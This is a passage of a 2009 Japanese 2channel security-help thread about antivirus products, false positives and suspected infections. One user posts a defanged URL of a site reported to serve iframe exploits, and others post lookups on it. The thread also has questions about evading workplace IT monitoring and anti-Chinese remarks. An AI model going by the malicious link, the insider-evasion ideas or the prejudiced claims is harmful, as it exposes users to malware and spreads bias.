304 ◆N9P3SuvBPo :2009/07/12(日) 23:54:22
>298
今、確認してみたんだけど俺のには
>ロックダウンされたインターネット
とかいうものはないですね。

インターネット ゾーン、イントラネット ゾーン、信頼済みサイト ゾーン、制限付きサイト ゾーン、
ローカル コンピュータ ゾーン、ロックダウンされたローカル コンピュータ ゾーン
ならあるのですが。

インターネット ゾーンのセキュリティを最高レベルにしたいのなら、
[コンピュータの構成]-[管理テンプレート]-[Windows コンポーネント]-[Internet Explorer]
[インターネット コントロール パネル]-[セキュリティ ページ]の中にある

[インターネット ゾーンのテンプレート]のプロパティを開いて、
有効を選択→最高に設定→適用、でOKなのですが。

俺のはXPのメディアセンターですから、違ってるかも…
305名無しさん@お腹いっぱい。:2009/07/12(日) 23:54:32
>>291
嫌がらせだとしたら俺のような初心者にはホント効果抜群ですw
>>292
FirefoxでG DATAスレ見ても駄目ですし、専ブラ(V2Cです)でも駄目ですね
>>295
一度ダウンロード出来ればファイル自体を例外設定には出来るので確かに根本的解決にはなりませんが試して見ようと思います、ありがとうございます

G DATAスレで聞けば一発で分かるのでしょうが如何せんスレそのものがあれなのが無念です
しかしウイルスガードを無効にするに設定して問答無用で遮断するとはいったい何を無効にしているのか解せませぬ…
306 ◆N9P3SuvBPo :2009/07/12(日) 23:58:06
>305
Firefoxも専ブラも駄目なら、IEはまず無理でしょうね。

あとの手は携帯で見るか…ネットカフェや友人のPCで見せてもらう…かな?
307 ◆N9P3SuvBPo :2009/07/13(月) 00:39:28
まだいますか?>>305

G DATAスレの836-837に
>836 名前:名無しさん@お腹いっぱい。 投稿日:2009/07/11(土) 01:39:16
>あんまりにネットが重いから設定で「インターネットコンテンツのスキャン」を無効にして使ってんだけど
>これ切っちゃうとセキュリティソフトとして無意味?


>837 名前:名無しさん@お腹いっぱい。 投稿日:2009/07/11(土) 16:13:50
>切っても常駐保護によるウイルス検出は行われるので
>無意味にはならない

というレスがあったのですが、「インターネットコンテンツのスキャン」を無効にしても、G DATAのスレは見れませんか?
308名無しさん@お腹いっぱい。:2009/07/13(月) 00:54:59
>>307
あー見られました!ありがとうございます!
しかし本命の誤検知ファイルをダウンロードはこれでも出来ない様ですね
G DATAスレで聞いてみようと思います う〜むなんだか叩かれそうだがw てか俺の書き込みがコピペされてあってワロタ
309名無しさん@お腹いっぱい。:2009/07/13(月) 01:31:07
Firefox 3.xって、ダウンロードしたファイルをインスコされてるアンチウイルスでスキャンするよね?
>>286はそれで引っかかってるんじゃねーの?
310名無しさん@お腹いっぱい。:2009/07/13(月) 02:12:36
>>154です。
COMODO Firewallを導入しました。
一番良さそうだったし、最近日本語のも対応したみたいなんで。

導入後なぜかルーターの不正アクセスがなくなりました。
以前はソフトバンクBBからや中国からの攻撃がよくあったのですが、、、。
とりあえず一安心です。
311名無しさん@お腹いっぱい。:2009/07/13(月) 02:57:25
>>309
あー本当だ出来ました、あーあーあー凡ミスすぎて非常に情けないです…
それにしても答えて下さった皆さん本当にありがとうございました
312名無しさん@お腹いっぱい。:2009/07/13(月) 12:42:52
>>308
どうも、誤検知じゃなさそうですよ。あれはブロックしてもおかしくない。
313名無しさん@お腹いっぱい。:2009/07/13(月) 13:06:53
>>312
あれはパッカーの誤検出でしょ?
アンパックしてからスキャンしてみなよ。
314名無しさん@お腹いっぱい。:2009/07/13(月) 16:17:07
ルータってファイアウォールの前にあるんじゃないのですか?
315名無しさん@お腹いっぱい。:2009/07/13(月) 17:22:37
>>314
そうだよ
316名無しさん@お腹いっぱい。:2009/07/13(月) 17:23:20
クッキーを残しとくのはセキュリティ的にどれくらい危険ですか?
317名無しさん@お腹いっぱい。:2009/07/13(月) 17:24:05
フラッシュプレイヤーのクッキーも毎回消したほうがいいんですか?
318名無しさん@お腹いっぱい。:2009/07/13(月) 22:35:01
>>316-317
まずはこの辺の記事をお読みください。

やさしいセキュリティ(トラッキングCookie)
ttp://eazyfox.homelinux.org/Security/Beginner/beginner08.html

生活に及ぶ危険 オンラインショップ編:クッキー
ttp://www.so-net.ne.jp/security/human/shopping/cookie.html
319名無しさん@お腹いっぱい。:2009/07/13(月) 23:01:00
>>318
よい記事どうも
勉強してみます
320名無しさん@お腹いっぱい。:2009/07/13(月) 23:40:40
>>259-260 >>275-276 >>318-319
321名無しさん@お腹いっぱい。:2009/07/14(火) 03:12:03
相談なんだがウイルスセキュリティZERO使ってるけどフリーの奴と
どっちがお勧め?
322名無しさん@お腹いっぱい。:2009/07/14(火) 03:14:18
               .|   |  | |   |    |  | |   |   |   || | |
               .|   |  | レ  |    |  | |   |  J   || | |
    ∩___∩    |   |  |     J    |  | |  し     || | |
    | ノ\   ,_ ヽ  .|   レ |      |  レ|       || J |
   /  ●゛  ● |   .J      し         |     |       ||   J
   | ∪  ( _●_) ミ             .|    し         J|
  彡、   |∪|   |              .J                レ
 /     ∩ノ ⊃  ヽ
 (  \ / _ノ |  |
  \  "  /  | |
   \ / ̄ ̄ ̄ /
323名無しさん@お腹いっぱい。:2009/07/14(火) 03:20:39
>>322
釣りが多すぎて困惑w
324名無しさん@お腹いっぱい。:2009/07/14(火) 03:22:06
ハチ公の予感 っていうAA作るわ
325名無しさん@お腹いっぱい。:2009/07/14(火) 09:10:35
アダ被の質問掲示板にいる イカ って回答者

もしかしてハチ?
326名無しさん@お腹いっぱい。:2009/07/14(火) 12:17:01
>>324
期待してるwktk(n‘∀‘)η゜・*゜・*
327名無しさん@お腹いっぱい。:2009/07/14(火) 15:23:07
>>321
どう見てもフリーの方が優秀です。
328名無しさん@お腹いっぱい。:2009/07/14(火) 16:55:19


      ∧_∧  トンファーハチ公の予感キ〜ック!
     _(  ´Д`)
    /      )     ドゴォォォ _  /
∩  / ,イ 、  ノ/    ∧ ∧―= ̄ `ヽ, _
| | / / |   ( 〈 ∵. ・(   〈__ >  ゛ 、_
| | | |  ヽ  ー=- ̄ ̄=_、  (/ , ´ノ \
| | | |   `iー__=―_ ;, / / /
| |ニ(!、)   =_二__ ̄_=;, / / ,'
∪     /  /       /  /|  |
     /  /       !、_/ /   〉
    / _/             |_/
    ヽ、_ヽ
329名無しさん@お腹いっぱい。:2009/07/14(火) 23:30:26
スレチかもしれないが、さっきびっくりした。
半角板のぞいてたら、画面が暗くなり、変なアニメ
「しね〜 しね〜」と変な歌が流れる。
あわててALT+F4 押しても消えない。電源を押すと、ノート(だいなぶっく)なので、
スリープ状態。また電源を押すと、デスクトップは出るが、また画面が暗くなり変な歌。
何回かそれらの動作を繰り返し、隙間を縫って
スタート→電源を切る
ほっとして電源を立ち上げると元に戻った。安心した。
念のためにトレンドマイクロのチェックやったが、ウイルスは検出されず。
一体なんなんだったんだ???
330名無しさん@お腹いっぱい。:2009/07/14(火) 23:32:30
ハチ公かわいいよハチ公
331名無しさん@お腹いっぱい。:2009/07/14(火) 23:46:10
>>329
どの板でもスレ見ているだけではマルウエアや冗句ソフトがダウンロード
されたり実行されたりはしないんだよ。
リンクを踏んだことを隠す必要があるんだねw

そうそう、トレンドマイクロで白だったからといって何事も無かったとはかぎらないよーw
332名無しさん@お腹いっぱい。:2009/07/14(火) 23:47:53
マルチにマジレスw
333名無しさん@お腹いっぱい。:2009/07/14(火) 23:50:26
tube8とか見るのって大丈夫ですか?
334名無しさん@お腹いっぱい。:2009/07/14(火) 23:53:37
勇気あるな
335名無しさん@お腹いっぱい。:2009/07/14(火) 23:53:54
     ___
   /|∧_∧| マルチとハチ公
   ||. (・ω・`| お断りします
   ||oと.  U|
   || |(__)J|
   ||/彡 ̄ ガチャ
336名無しさん@お腹いっぱい。:2009/07/14(火) 23:55:15
中部地方は逝ってよし
337名無しさん@お腹いっぱい。:2009/07/15(水) 00:01:28
>>334
だめなんですか?
338名無しさん@お腹いっぱい。:2009/07/15(水) 00:02:21
もう十回くらい見てるんですけど・・
339名無しさん@お腹いっぱい。:2009/07/15(水) 00:03:05
>>335
帰れ!
340名無しさん@お腹いっぱい。:2009/07/15(水) 00:04:48
ハチ酉忘れてるぞw
341名無しさん@お腹いっぱい。:2009/07/15(水) 00:04:59
5回くらい抜いたかな
342名無しさん@お腹いっぱい。:2009/07/15(水) 00:18:46
早めに消すよ
http://sakuratan.ddo.jp/imgboard/img-box/img20090714192031.jpg
343名無しさん@お腹いっぱい。:2009/07/15(水) 00:21:23
グロ注意
344名無しさん@お腹いっぱい。:2009/07/15(水) 00:47:46
知らない間に、自分のPCのCドライブが、ファイルサーバーの共有ドライブに隠しディレクトリとして
保存されているのに気が付きました。 怒ったので削除しようと思いましたが、ファイル復活ソフト
とか使われてしまったら意味ないですよね? すごく悔しいです。
情シスの人間に一泡ふかせてやりたいのですが、どうしたら復活出来ないようにファイル削除することが
できるのでしょうか? ご指導お願いします。

【使用OS】      『XP SP3』(ファイルサーバーも同じ)
【PCスペック】    『CPU: 2.4GHz 、メモリ: 1024MB』
【使用ブラウザ】  『IE 7』
【Microsoft Updateの更新の状態】 『自動更新設定

共有ドライブは、ファイルサーバの外付USBで繋がれており、直接触ることができます。
そしてファイルサーバーの管理パスワードも知っています。
デフラグとかで痕跡を消去することはできるのでしょうか?
345名無しさん@お腹いっぱい。:2009/07/15(水) 00:51:40
>>344
なんとなく不安を感じて聞くんだが
それって自分のPCというより、職場/学校の備品ってことか?
346345:2009/07/15(水) 00:57:11
いいえ、自分の私物です。 ドメインは無く、ワークグループで情報を共有しています。
347名無しさん@お腹いっぱい。:2009/07/15(水) 01:35:54
勝手に保存されたと怒っているようだが、勝手に保存できるような
設定のPCを勝手に繋いだバカの責任。
自分の私物のPCを勝手に繋いだら普通は懲戒もの。再就職先探せば?
348名無しさん@お腹いっぱい。:2009/07/15(水) 03:13:35
ちょっと教えてもらいたいのですが、
1週間前のことですが、DVDのトレーがたまに開閉するようになり、
ノイズかなんかかなぁぐらいで放置していましたが、
2日目位からネットの接続が遅くなり、グーグルは開けますが、ヤフーを開くと固まってしまう状態でした。
なんか怖くなり、トレンドマイクロのオンラインでスキャンしましたが、何も出ず
SPYBOTでスキャンしたところダブルクリックのスパイウェアが1個出てきただけでした。
ブラウザの表示が困難になったので、ママンを変えるついでにVISTAを再インスコしたら
直ったので事なきを得たのですが、これは何かのウイルスに感染していたのでしょうか?
または、ママンの故障なのでしょうか?SSD、メモリは流用したので壊れてはいませんでした。
申し訳ないのですが、何かおわかりになられる方がいらっしゃいましたらご教授願います。
お願いいたします。
349名無しさん@お腹いっぱい。:2009/07/15(水) 03:34:51
>1週間前のことですが、DVDのトレーがたまに開閉するようになり、
ディスクに書きおわった時に発生するあっかんべー現象でなければ異常。

>2日目位からネットの接続が遅くなり(略)
特定はできませんが、PCの不調なのか(熱暴走とか)、HDD内のファイルが壊れたのか、マルウェア感染の影響なのか
判断のしようがありません。

交換したM/Bのコンデンサー(CPUの周辺に並んでるもの)が膨らんだり、破裂したり、液もれしたりはしていませんか?
その場合は、M/Bの故障です。ついでに、HDDの物理エラーがないかどうか、CHKDSKを行ってみてください。

マルウェアの影響を疑う場合は、複数のセキュリティソフト(オンラインスキャンを使用)でスキャンして、どこのベンダーでも
発見できない場合は、安心していいんじゃないかと思われます。
350名無しさん@お腹いっぱい。:2009/07/15(水) 10:11:31
質問よろしくです。

ネットの接続が定期的に切れるんで、電話会社に電話して調べてもらったんですが、
調べてもらっている間、証券会社のツール(パスワードが必要な)をひらいてたんですが
調べている人が、開いている自分のツールを見てしまった可能性はあるでしょうか・・・?


351名無しさん@お腹いっぱい。:2009/07/15(水) 12:21:17
あります
352名無しさん@お腹いっぱい。:2009/07/15(水) 15:04:06
セキュリティに詳しい人ってみんなエロサイトとか好きなんでしょ?
そのために勉強したんだよね?
353名無しさん@お腹いっぱい。:2009/07/15(水) 15:58:51
答えは貴方の胸の中に
354名無しさん@お腹いっぱい。:2009/07/15(水) 16:00:52
>>352
ハチ公に聞けや
355名無しさん@お腹いっぱい。:2009/07/15(水) 16:07:51
イカって野郎って八頭だろ

何が「永久保存してください。」だ
356中山健:2009/07/15(水) 17:19:01
タコ八郎ですが何か?
357名無しさん@お腹いっぱい。:2009/07/15(水) 19:06:12
【使用OS】『VistaHP』
【PCスペック】『PentiumDC E2200 2,2GHz』
【使用ブラウザ】『Firefox3,5』
【Microsoft Updateの更新の状態】『自動更新は停止状態』
【セキュリティソフトと年式】『ウイルスバスター30日体験版』
【具体的な症状】『3〜6秒重くなる』
【過程と措置】Safariを使ってみたら上記のような症状はなし
358名無しさん@お腹いっぱい。:2009/07/15(水) 19:12:20
そうなんだ
359名無しさん@お腹いっぱい。:2009/07/15(水) 19:18:33
まぁ、バスターの所為だろうな。
360名無しさん@お腹いっぱい。:2009/07/15(水) 21:21:39
【業界1位】ウイルスバスター2009 Part23【独走中】
http://pc11.2ch.net/test/read.cgi/sec/1247244615/318

318 名前:名無しさん@お腹いっぱい。[] 投稿日:2009/07/15(水) 19:12:59
【使用OS】『VistaHP』
【PCスペック】『PentiumDC E2200 2,2GHz』
【使用ブラウザ】『Firefox3,5』
【Microsoft Updateの更新の状態】『自動更新は停止状態』
【セキュリティソフトと年式】『ウイルスバスター30日体験版』
【具体的な症状】『3〜6秒重くなる』
【過程と措置】Safariを使ってみたら上記のような症状はなし
どうすればいいですか?
361名無しさん@お腹いっぱい。:2009/07/15(水) 21:41:49
(ο^д^)ノシ
362名無しさん@お腹いっぱい。:2009/07/15(水) 21:43:37
(´・ω・`)ショボーン
363名無しさん@お腹いっぱい。:2009/07/15(水) 22:07:35
専スレあるけど、ウィルスクリアは優秀なほう?
みなさんはどう思われます?
364名無しさん@お腹いっぱい。:2009/07/15(水) 22:26:04
>>363
普通。並。ベター。
別に使えないわけじゃないが、優秀とは思わない。

時々オンラインスキャンして(脳豚やカスペ、Fセキュなど)万が一検出があれば
乗り換えを検討すると良い。
365名無しさん@お腹いっぱい。:2009/07/15(水) 23:08:20
質問です。

私のウイルスセキュリティZEROたんがトロイを数匹見つけるほど末期なパソコン状態です。
せっかくウイルスバスターを買ったのですが、試供品を別のパソコンで使ってるので
それが終わってからにしようとたらたらしていたらどんどんひどいことになっています。

昨日くらいから、マイコンピュータを開くと問答無用で応答無し→送信しますか?状態になります
これを、マイピクチャからフォルダを選択したらCドライブの中とか外付けの中に逝くことはできます

こういう現象はウイルスのせいでしょうか?
僕はどうしたらいいでしょうか?
よろしくお願いします。
366名無しさん@お腹いっぱい。:2009/07/15(水) 23:10:02
フォーマットしてリカバリーしてください。
367365:2009/07/15(水) 23:15:24
>>366
ありがとうございます。
フォーマットとは何でしょう?
ぐぐったのですが意味がわかりません。
リカバリはわかりますが・・・
368名無しさん@お腹いっぱい。:2009/07/15(水) 23:16:11
またハチ公か!!!!!!!!!!!!!!!!!!!!!!
369名無しさん@お腹いっぱい。:2009/07/15(水) 23:24:48
>>367
PC使っててフォーマットしたこと無いの?
なんというゆとり…
370名無しさん@お腹いっぱい。:2009/07/15(水) 23:34:15
ウィルスって感染してすぐ症状出るの?
最初気付かなくてじわりじわり来るウィルスってあるの?
371365:2009/07/15(水) 23:36:50
>>369
それが無いんです。
よろしくご教授お願いします。
372名無しさん@お腹いっぱい。:2009/07/15(水) 23:38:36
マルチ
http://pc11.2ch.net/test/read.cgi/sec/1244633881/74
373名無しさん@お腹いっぱい。:2009/07/15(水) 23:41:15
 ┌○┐
 │お|ハ,,ハ  マルチは激しく
 │断|゚ω゚ )  お断りします
 │り _| //
 └○┘ (⌒)
    し⌒
374名無しさん@お腹いっぱい。:2009/07/15(水) 23:41:55
今日システムの復元したんだけど、その後見たら復元ポイントが全部無くなってた。
復元ポイントを消すようなウィルスってある?
375 ◆N9P3SuvBPo :2009/07/15(水) 23:43:01
>370
すぐ症状が現れる場合もあるし、全然現れない場合もあります。

前者はワンクリウェアやアドウェアなど、新しい窓を出す奴
後者はボットやルートキットなどの、ユーザーに気付かれずに活動するもの

あと、特定の時刻になると発病するマルウェアもある。
376名無しさん@お腹いっぱい。:2009/07/15(水) 23:46:51
>>371
USBフラッシュメモリをフォーマットする方法<Windows Vista(R)> 【動画手順付き】: dynabook.comサポート情報
http://dynabook.com/assistpc/faq/pcdata/007560.htm

ちなみに「フォーマットしてリカバリ」ってのは
HDDをフォーマットしてリカバリっていう意味ね
377名無しさん@お腹いっぱい。:2009/07/15(水) 23:47:25
>>375
いっぱいあるんだね
気付かれないで活動って、例えばどんな症状?
378名無しさん@お腹いっぱい。:2009/07/15(水) 23:47:51
>>375
( ´(ェ)`)ノシ
379365:2009/07/16(木) 00:10:21
マルチではないです。
多分>>372-373あたりの自演といったところでしょう
困ったものです


あっちは無視してこちらでお願いします
380名無しさん@お腹いっぱい。:2009/07/16(木) 00:15:20
> 365:名無しさん@お腹いっぱい。:2009/07/15(水) 23:08:20
> 74 :名無しさん@お腹いっぱい。:2009/07/15(水) 23:09:22
381名無しさん@お腹いっぱい。:2009/07/16(木) 00:19:25
>>380
見るところは一緒だなw
382名無しさん@お腹いっぱい。:2009/07/16(木) 00:30:32
そういえば>>76の脆弱性はMS09-032(kb973346)で対応したんだね。
383名無しさん@お腹いっぱい。:2009/07/16(木) 01:27:35
>>365
お金がかかるかもしれないけど
PC専門店で、持込みPCの診断・駆除してくれるところがあるから診てもらったら?
もしOS再インストール(リカバリ)を薦められたら代行作業もしてくれると思うよ
384名無しさん@お腹いっぱい。:2009/07/16(木) 03:26:28
>>365に対しては、おとなしくPCリカバリしろ以外の解決策はないと思うぜ。
385名無しさん@お腹いっぱい。:2009/07/16(木) 06:23:14

           ∧_∧ 
          ry ´・ω・`ヽっ          
          `!       i     まいったなあ・・・
          ゝ c_c_,.ノ
386名無しさん@お腹いっぱい。:2009/07/16(木) 18:58:52
>>384
というか、これはもう修理だろ。
387 ◆N9P3SuvBPo :2009/07/16(木) 19:51:03
>>382
そうみたいですね。
他にもゼロデイがあったようだが、それも修正されたみたいだね。

φ(^_ゞ^)ノシ
388名無しさん@お腹いっぱい。:2009/07/16(木) 21:12:10
ノートン 2009とカスペルスキー 2009
どっちを買うかで悩んでいるのですが、性能や軽さなどの面を考慮すると
どちらを買うべきでしょうか?
あとカスペルスキーは初心者には扱いにくいというのは本当ですか?
389八頭 ◆YAGApwSaEw :2009/07/16(木) 21:55:25
>>◆N9P3SuvBPo
セキュアブレイン gredの統計情報を見てどう感じる?
ttp://www.gred.jp/
>>388
PC専門店の人、何人かに実際のところを聞いてみればいいよ
390名無しさん@お腹いっぱい。:2009/07/16(木) 22:04:24
>>387
(ο^д^)ノシ
391 ◆N9P3SuvBPo :2009/07/16(木) 22:13:46
>389
さあ?
そんなものに頼る必要ないからな、俺の場合…

>390
φ(゚_ゝ゚)ノシ
392名無しさん@お腹いっぱい。:2009/07/16(木) 22:35:22
ハチ公(U^ω^)わんわんお!
393八頭 ◆YAGApwSaEw :2009/07/16(木) 22:38:49

   もっぁぁぁ・・・
    (´ε` )
394名無しさん@お腹いっぱい。:2009/07/16(木) 22:38:52
>>391
(ο^д^)ノシ
395名無しさん@お腹いっぱい。:2009/07/16(木) 23:24:09
( ^ω^)
396名無しさん@お腹いっぱい。:2009/07/17(金) 02:01:59
>>388
わたしならその2択でノートンを選ぶことはないね。新種への対応が致命的に遅すぎる。

>あとカスペルスキーは初心者には扱いにくいというのは本当ですか?
人それぞれ。
397名無しさん@お腹いっぱい。:2009/07/17(金) 02:11:47
カスペのオンラインスキャンでフルスキャンしたら、2時間かかった
普通にこんなもん?
常駐のセキュリティソフトのフルスキャンは、1時間かからない
398名無しさん@お腹いっぱい。:2009/07/17(金) 02:23:32
GDATAを選んどけば間違いなし
399名無しさん@お腹いっぱい。:2009/07/17(金) 03:50:56
いやあ、Gは初心者さんには辛かろう……
400名無しさん@お腹いっぱい。:2009/07/17(金) 15:33:36
トロイの仕込んであるURLを踏んでしまいました
すぐに閉じたせいかノートン先生に反応がありません
今スキャンしていますがスキャン後何も検出されなければ大丈夫と考えていいのでしょうか?
401名無しさん@お腹いっぱい。:2009/07/17(金) 16:09:29
反応しなかったのはノートン先生がまだ対応していない新種のトロイだから
今スキャンしても何も検出されない
402名無しさん@お腹いっぱい。:2009/07/17(金) 17:19:22
>>400
http://pc11.2ch.net/test/read.cgi/sec/1247110729/12
403400:2009/07/17(金) 20:19:23
>>401-402
ありがとうございます
一応報告はしておきました
今のところ不具合は何も見つかっていないのですが
トロイに感染しているかどうかはどうすれば調べられるのでしょうか?
新種ということでスキャンにも引っかからないとすればどうすればいいのか
教えていただきたいです
404名無しさん@お腹いっぱい。:2009/07/17(金) 20:30:47
残念ながら未知のトロイに対して「○○なら感染している」と判断できるものはない。
あればセキュリティソフトがとっくに対処してるわけで・・・
ProcessExplorer等で怪しいプロセスの監視、
netstat -anoで通信しているプロセスがないか監視、
ルータでHTTP等をブロックして監視等するしかない。
それで何もないからって、感染していないとは誰も保証はできない。
少しでも不安があるならリカバリするのが確実。
405名無しさん@お腹いっぱい。:2009/07/17(金) 20:34:42
>>404
そうなんですか
プロセスやポートを調べてみましたが不審なものはなかったように思います
一応キャッシュも削除しておきました
なにか問題が起こればまた報告します
参考までに、以下のサイトでした
h t t p://www.gomenifty.com/Blog/
406名無しさん@お腹いっぱい。:2009/07/17(金) 20:37:56
VBS:Obfuscated-gen [Trj]
407名無しさん@お腹いっぱい。:2009/07/17(金) 20:49:18
NOD32の期限がもうすぐ切れるので、乗り換えを考えています。
何かオススメはありますか?
408八頭 ◆YAGApwSaEw :2009/07/17(金) 20:52:30
>>400
Norton Safe Web, from Symantec - report
ttp://safeweb.norton.com/report/show?url=http%3A%2F%2Fwww.gomenifty.com%2FBlog%2F&.x=12&.y=9
Total threats on this site: 3
409名無しさん@お腹いっぱい。:2009/07/17(金) 20:54:12
>>408
脅威が3つも……
ありがとうございます
今のところPCに不具合はありません
410名無しさん@お腹いっぱい。:2009/07/17(金) 20:54:21
>>407
NOD32
411八頭 ◆YAGApwSaEw :2009/07/17(金) 20:54:39
ちなみに、セキュアブレイン gred 無反応でしたw
412 ◆N9P3SuvBPo :2009/07/17(金) 21:30:54
>409
そのサイト、Iframeタグで脆弱性を突くサイトを読み込ませる仕組みになってるぽいな。
アドレス削ってトップページに行くと中華のようなサイトが表示された。

安心しろ!
過去の脆弱性を突くタイプだから、WindowsUpdateしてれば感染しないから。
413名無しさん@お腹いっぱい。:2009/07/17(金) 21:54:22
>>412
去年の末あたりから止めてました……
今のところまだ大丈夫です
414名無しさん@お腹いっぱい。:2009/07/17(金) 22:39:32
ちなみにaguseだと
ソースチェッカーオンラインによる迷惑メール送信サイトブラックリスト
民間企業Finjanによるマルウェアを含むサイトのブラックリスト
の二つがCAUTIONだった。

IPアドレスは61.139.126.91
ネットワーク名 CHINANET-SC
中国か…
415名無しさん@お腹いっぱい。:2009/07/18(土) 00:43:42
ベクターでGdataというアンチウイルスの安売りをしているのですが
3台PC用に1年間のライセンスというのは
1年使える更新キーが3つつくということでしょうか
つまり一台で使うならバージョンアップを考えなければ3年使えるのでしょうか
それともインストール先が1台だろうと2台だろうと1年で使えなくなるのでしょうか
416名無しさん@お腹いっぱい。:2009/07/18(土) 00:52:00
>>415
> ベクターでGdataというアンチウイルスの安売りをしているのですが

ここはベクターのサポセンじゃないのね
ベクターに質問して下さい
ttp://www.vector.co.jp/info/contactus.html
417名無しさん@お腹いっぱい。:2009/07/18(土) 01:18:42
質問です。

CD-R等にデータを焼くと、何時何分何秒に何MByteのデータを焼いたということが
セキュリティソフトによって会社にばれるようなことはあるのでしょうか?
418名無しさん@お腹いっぱい。:2009/07/18(土) 01:20:59
>>417
キタ━━━━━━(゚∀゚)━━━━━━ !!!!!
419名無しさん@お腹いっぱい。:2009/07/18(土) 01:22:04
853 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/07/18(土) 01:13:40
質問です。

CD-R等にデータを焼くと、何時何分何秒に何MByteのデータを焼いたということが
セキュリティソフトによって会社にばれるようなことはあるのでしょうか?
420名無しさん@お腹いっぱい。:2009/07/18(土) 01:22:15
会社がそういう対策とってるならな
421名無しさん@お腹いっぱい。:2009/07/18(土) 01:24:05
402 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/07/18(土) 01:21:41
質問です。

CD-R等にデータを焼くと、何時何分何秒に何MByteのデータを焼いたということが
セキュリティソフトによって会社にばれるようなことはあるのでしょうか?
422名無しさん@お腹いっぱい。:2009/07/18(土) 01:25:02
 ┌○┐
 │お|ハ,,ハ  マルチポスト
 │断|゚ω゚ )  お断りします
 │り _| //
 └○┘ (⌒)
    し⌒
423名無しさん@お腹いっぱい。:2009/07/18(土) 01:31:03
ハチ公(U^ω^)わんわんお!
424名無しさん@お腹いっぱい。:2009/07/18(土) 01:43:26
( ´-`).。oO(本家のQ&Aに載っている事や、マルチの上会社の目を気にする質問
にマジレスする回答者がいると思ってカキコする者達って何を考えているのだろう)
425名無しさん@お腹いっぱい。:2009/07/18(土) 02:54:35
また八公が懲りずにリンク張るだけの糞バイスしてんのか
426名無しさん@お腹いっぱい。:2009/07/18(土) 03:29:19
ハチ公(U^ω^)わんわんお!
427名無しさん@お腹いっぱい。:2009/07/18(土) 04:01:43
バカの一つ覚えとはこの事だなw
428名無しさん@お腹いっぱい。:2009/07/18(土) 05:54:41
>>407
ノートン2009で決まり。
429名無しさん@お腹いっぱい。:2009/07/18(土) 08:37:42
>>407
NOD32→ESS PFWついてウマー

軽さを求めるなら、NOD32から他への乗り換えは、AntiVir位しか勧められないが、英語になるので、
初心者さんにはお勧めできない。

PCスペックがそれなりにあるなら、カスペあたりにしとくと幸せになれます。
八頭推奨のノートンはやめときましょう。
430名無しさん@お腹いっぱい。:2009/07/18(土) 08:49:06
>>400 >>405
オンラインゲームのアカウントハック用サイトですね。

でも、ノートンならその呼び出しスクリプト対応してます。
ttp://www.virustotal.com/analisis/1945e4c5ee5fec025dd2295faef3f6d8942effbc37fc4f346a4f4efa08c4640f-1247473483

最終的に落ちてくるexeにも対応していますので、ノートンのパターンが最新であればブロックできる筈です。
ttp://www.virustotal.com/analisis/fa6283c76718da1579623313d8fc8fe678fda21afd63f7ca5c11dd4589896d32-1247854411

ブロックメッセージが出ていないというなら、相手のサイトが重くて、データを受信しきる前に閉じたので無害だった
可能性が高いでしょう。(可能性であり、保証ではありません。ねんのため)

PG2を入れており、リネージュ資料室のリストで中国をブロックしていた場合は、アクセスすらしていないので、
問題はでないということになります。ネトゲをやるなら、IPフィルターで中国をブロックしておくと安心ですよ。
431名無しさん@お腹いっぱい。:2009/07/18(土) 11:09:18
中国のIPブロックの仕方おしえてくれませんか
432さやちんこ@株主 ★:2009/07/18(土) 12:31:36
【中国朝鮮】PeerGuardian 3【YBBを弾こう】
http://tmp5.2ch.net/test/read.cgi/download/1129111079/
433名無しさん@お腹いっぱい。:2009/07/18(土) 13:16:18
どもども
434名無しさん@お腹いっぱい。:2009/07/18(土) 16:02:12
質問なんですが今kasperskyのセキュリティー使ってるんだけど、
来月に期限が切れるので乗り換えようと思います。

乗り換えを考えてるソフトはnortonのセキュリティー、norton360、ソースのzeroのです。
私はITエンジニアクラスのスキルはありませんので、乗り換えるとしたらどれがお奨めでしょう?
osはwindowsvistasp2でスペックはかなり良いほうだと思います。
435名無しさん@お腹いっぱい。:2009/07/18(土) 17:02:42
>>416
知らないなら答えなければいいのに
とりあえず誰でもいいから見下す相手が欲しくてこのスレにいるのね?
436名無しさん@お腹いっぱい。:2009/07/18(土) 17:08:05
>>416みたいなゴミにレスして本題を忘れていたw

>>415
可能だよ
でもG-DATAは検出率は高いけど
他のセキュリティソフトと比べても重いソフトなので
C2D以上くらいのCPUを積んでないと作業に支障が出ると思うよ
推奨スペック確認してみて
437名無しさん@お腹いっぱい。:2009/07/18(土) 17:51:47
携帯から失礼します。友人に進められてウイルスバスター2009を購入したのですが、
ウイルスバスター2009は以前流行ったGENOを防いでくれるのでしょうか?
友人いわく大丈夫だそうですが…
438名無しさん@お腹いっぱい。:2009/07/18(土) 18:16:47
半分くらいはブロックするかもしれないけど100%は無理
バスターは検出率が低いから半分行かないかも
439名無しさん@お腹いっぱい。:2009/07/18(土) 18:32:24
>>437
問題ない
GENO自体もう無いし
440437:2009/07/18(土) 18:34:11
>>438
そうですか…
素直にノートン先生あたりにすれば良かったのでしょうか…
441名無しさん@お腹いっぱい。:2009/07/18(土) 18:36:23
>>438は嘘
なりすましか単なるアンチか
442名無しさん@お腹いっぱい。:2009/07/18(土) 19:02:59
>>440
ノートン、GDATA、カスペあたりならOK
フリーのavastでもGenoはブロックする
443名無しさん@お腹いっぱい。:2009/07/18(土) 19:04:21
そんな話じゃねえだろ
バスターで防げるかってことで
444名無しさん@お腹いっぱい。:2009/07/18(土) 19:05:07
答えは防げる
というか無いんだから防ぐも何もない
445名無しさん@お腹いっぱい。:2009/07/18(土) 19:14:09
ここでも中国人が糞バスター薦めて暴れてんのかw
446名無しさん@お腹いっぱい。:2009/07/18(土) 19:14:29
回答ありがとうございます。バスターでなんとか頑張ります。
447名無しさん@お腹いっぱい。:2009/07/18(土) 19:16:37
相変わらず中国人の情報操作は酷いなw
448名無しさん@お腹いっぱい。:2009/07/18(土) 19:17:27
トレンドマイクロは中国企業
情報操作は中国共産党譲り

ウィルスバスターの開発・張明正
ttp://japan.discovery.com/episode/index.php?eid1=866864&eid2=000000
「台湾人物誌U」 新聞局がディスカバリーと共同制作
ttp://www.taiwanembassy.org/ct.asp?xItem=43853&ctNode=3591&mp=202&nowPage=62&pagesize=30
「台湾10大国際ブランド」評価、トレンドマイクロが4年連続トップ
ttp://www.taiwanembassy.org/ct.asp?xItem=43637&ctNode=3591&mp=202&nowPage=53&pagesize=50
449名無しさん@お腹いっぱい。:2009/07/18(土) 20:17:11
誰か>434に答えんかい
450名無しさん@お腹いっぱい。:2009/07/18(土) 20:20:31
またkasperskyを使え。
